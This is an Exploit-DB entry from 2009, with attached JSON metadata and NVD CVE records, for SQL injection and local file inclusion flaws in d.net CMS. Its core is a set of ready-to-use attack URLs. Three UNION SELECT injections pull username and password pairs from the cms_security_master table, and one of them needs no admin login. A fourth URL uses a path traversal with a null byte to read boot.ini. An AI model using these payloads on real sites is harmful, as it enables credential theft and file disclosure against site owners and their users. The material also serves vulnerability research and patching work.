ID EDB-ID:9312
Type exploitdb
Reporter SirGod
Modified 2009-07-30T00:00:00
Description
d.net CMS (LFI/SQLI) Multiple Remote Vulnerabilities. CVE-2009-3514, CVE-2009-3515. Web application exploit for the PHP platform.
###############################################################################################################################################
[+] d.net CMS (LFI/SQLI) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
###############################################################################################################################################
[+] Download : http://sourceforge.net/projects/dnet/
[+] SQL Injection
PoCs
- No admin required
http://127.0.0.1/path/index.php?page=null+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,
6,7+from+cms_security_master+where+id=1--
- Admin required
http://127.0.0.1/path/dnet_admin/index.php?edit_id=null+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,
6,7,8,9+from+cms_security_master+where+id=1--&_p=1&type=news
http://127.0.0.1/path/dnet_admin/index.php?edit_id=1&_p=null+union+all+select+1,2,concat_ws(0x3a,username,password),4,
5,6,7+from+cms_security_master+where+id=1--&type=news
[+] Local File Inclusion
- PoC
- Admin required
http://127.0.0.1/path/dnet_admin/index.php?edit_id=2&_p=2&type=../../../../../../boot.ini%00
###############################################################################################################################################
# milw0rm.com [2009-07-30]
{"id": "EDB-ID:9312", "hash": "7d9cd340c3bab29483b5991f4e1d656e", "type": "exploitdb", "bulletinFamily": "exploit", "title": "d.net CMS LFI/sqli Multiple Vulnerabilities", "description": "d.net CMS (LFI/SQLI) Multiple Remote Vulnerabilities. CVE-2009-3514,CVE-2009-3515. Webapps exploit for php platform", "published": "2009-07-30T00:00:00", "modified": "2009-07-30T00:00:00", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/9312/", "reporter": "SirGod", "references": [], "cvelist": ["CVE-2009-3515", "CVE-2009-3514"], "lastseen": "2016-02-01T10:19:30", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2016-02-01T10:19:30"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3514", "CVE-2009-3515"]}], "modified": "2016-02-01T10:19:30"}, "vulnersScore": 7.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/9312/", "sourceData": "###############################################################################################################################################\n[+] d.net CMS (LFI/SQLI) Multiple Remote Vulnerabilities\n[+] Discovered By SirGod\n[+] http://insecurity-ro.org\n[+] http://h4cky0u.org\n###############################################################################################################################################\n\n[+] Download : http://sourceforge.net/projects/dnet/\n\n[+] SQL Injection\n\n PoC's\n\n - No admin required\n\n http://127.0.0.1/path/index.php?page=null+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,\n6,7+from+cms_security_master+where+id=1--\n\n - Admin required\n\n http://127.0.0.1/path/dnet_admin/index.php?edit_id=null+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,\n6,7,8,9+from+cms_security_master+where+id=1--&_p=1&type=news\n\n http://127.0.0.1/path/dnet_admin/index.php?edit_id=1&_p=null+union+all+select+1,2,concat_ws(0x3a,username,password),4,\n5,6,7+from+cms_security_master+where+id=1--&type=news\n\n[+] Local File Inclusion\n\n - PoC\n\n - Admin required\n\n http://127.0.0.1/path/dnet_admin/index.php?edit_id=2&_p=2&type=../../../../../../boot.ini%00\n\n###############################################################################################################################################\n\n# milw0rm.com [2009-07-30]\n", "osvdbidlist": ["58491", "58490", "58489"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:10:00", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in d.net CMS allow remote attackers to execute arbitrary SQL commands via (1) the page parameter to index.php; and allow remote authenticated administrators to execute arbitrary SQL commands via the (2) edit_id and (3) _p parameter in a news action to dnet_admin/index.php.", "modified": "2017-09-19T01:29:00", "id": "CVE-2009-3514", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3514", "published": "2009-10-01T14:30:00", "title": "CVE-2009-3514", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:10:00", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in dnet_admin/index.php in d.net CMS allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the type parameter.", "modified": "2017-09-19T01:29:00", "id": "CVE-2009-3515", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3515", "published": "2009-10-01T14:30:00", "title": "CVE-2009-3515", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}